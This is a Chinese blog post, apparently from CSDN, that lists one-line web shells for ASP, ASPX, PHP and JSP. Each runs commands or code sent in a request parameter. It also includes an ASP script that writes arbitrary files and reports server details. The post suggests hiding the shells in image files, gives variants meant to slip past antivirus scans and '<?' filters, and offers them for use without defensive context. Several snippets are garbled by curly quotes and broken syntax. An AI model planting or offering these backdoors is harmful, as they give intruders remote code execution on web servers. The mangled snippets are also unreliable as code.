一句话木马

<%eval request(“c”)%>
<%execute request(“c”)%>
<%execute(request(“c”))%>
<%ExecuteGlobal request(“sb”)%>
%><%Eval(Request(chr(35)))%><%
<%if request (“c”)<>"“then session(“c”)=request(“c”):end if:if session(“c”)<>”" then execute session(“c”)%>
<%eval(Request.Item[“c”],“unsafe”);%>
<%eval(request(“c”)):response.end%>
<%execute request(“c”)%><%<%loop<%:%>
<%<%loop<%:%><%execute request(“c”)%>
<%execute request(“c”)<%loop<%:%>
<%if Request(“c”)<>"" ThenExecuteGlobal(Request(“c”))%>
'不用"<,>"

<% @Language=“JavaScript” CodePage="65001"var lcx={‘名字’:Request.form(’#’),‘性别’:eval,‘年龄’:‘18’,‘昵称’:‘请叫我一声老大’};lcx.性别((lcx.
名字)+’’) %>

<%eval request(chr(35))%>
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1”) ms.Language=“VBScript” ms.AddObject"response",response ms.AddObject
“request”,request ms.ExecuteStatement(“ev”&“al(request(”“c”"))")%>
<%dy=request(“dy”)%><%Eval(dy)%>
if Request(“sb”)<>"" then ExecuteGlobal request(“sb”) end if
PHP一句话

<?php eval($_POST1);?> <?php if(isset($_POST['c'])){eval($_POST['c']);}?> <?php system($_REQUEST1);?> <?php ($_=@$_GET1).@$_($_POST1)?> <?php eval_r($_POST1)?> <?php @eval_r($_POST1)?>//容错代码 <?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 <?$_POST['c']($_POST['cc']);?> <?$_POST['c']($_POST['cc'],$_POST['cc'])?> <?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/h=@eval_r($_POST1); <?php echo `$_GET['r']` ?>

//绕过<?限制的一句话

JSP一句话

复制代码代码如下:

<%if(request.getParameter(“f”)!=null)(newjava.io.FileOutputStream (application.getRealPath("\")+request.getParameter(“f”))).write (request.getParameter(“t”).getBytes());%>
提交客户端

再补充几个：

推荐还是把一句话加进图片里面去。
普通的php一句话：<?php @eval($_POST['r00ts']);?>
普通的asp一句话：<%eval(Request.Item[“r00ts”],”unsafe”);%>
aspx突破一流的：
[code]
dim da
set fso=server.createobject(“scripting.filesystemobject”)
path=request(“path”)
if path<>"" then
data=request(“da”)
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write “yes”
else
Response.Write “no”
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write “<form action=” method=post>"
Response.Write “”
Response.Write “
”
Response.Write “当前文件路径:”&server.mappath(request.servervariables(“script_name”))
Response.Write “
”
Response.Write “操作系统为:”&Request.ServerVariables(“OS”)
Response.Write “
”
Response.Write “WEB服务器版本为:”&Request.ServerVariables(“SERVER_SOFTWARE”)
Response.Write “
”
Response.Write “”
Response.Write “
”
Response.Write “”
Response.Write “”

ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话：<?php (])?>

<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system

($_REQUEST[1]);?>

来源：CSDN

作者：IT小黑猪

链接：https://blog.csdn.net/weixin_46244909/article/details/104587728